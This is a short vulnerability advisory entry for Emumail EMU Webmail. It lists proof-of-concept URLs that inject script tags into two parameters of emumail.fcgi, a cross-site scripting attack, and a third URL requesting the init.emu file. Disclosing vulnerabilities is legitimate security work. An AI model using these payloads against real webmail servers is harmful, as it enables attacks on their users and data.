• info
• discussion
• exploit
• solution
• references

Emumail EMU Webmail Multiple Vulnerabilities

The following proof of concept has been provided:
http://www.example.com/webmail/emumail.fcgi?passed=parse&variable=%3Cscript%3Ealert( %22G%22)%3C/script%3E
http://www.example.com/webmail/emumail.fcgi?passed=go_index&folder=<script>alert("G")</script>
http://www.example.com/webmail/init.emu